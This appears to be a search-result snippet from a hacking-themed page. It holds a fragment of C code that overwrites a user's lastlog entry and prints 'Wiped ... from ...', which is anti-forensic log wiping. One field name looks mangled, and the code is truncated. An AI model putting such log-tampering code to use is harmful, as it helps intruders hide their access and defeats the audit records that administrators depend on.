if ((p=getpwnam(user))==NULL) return(-1); if ((fd=open(buffer,O_RDWR))<=0) return(-2); if (type==0) lseek(fd,p->CNSU_uid*sizeof(struct lastlog),SEEK_SET); write(fd,&ent,sizeof(struct lastlog)); close(fd); printf("Wiped %s from %s.\n",user,path); ...
www.dbjr.com.cn/hack/52...html 2025-6-8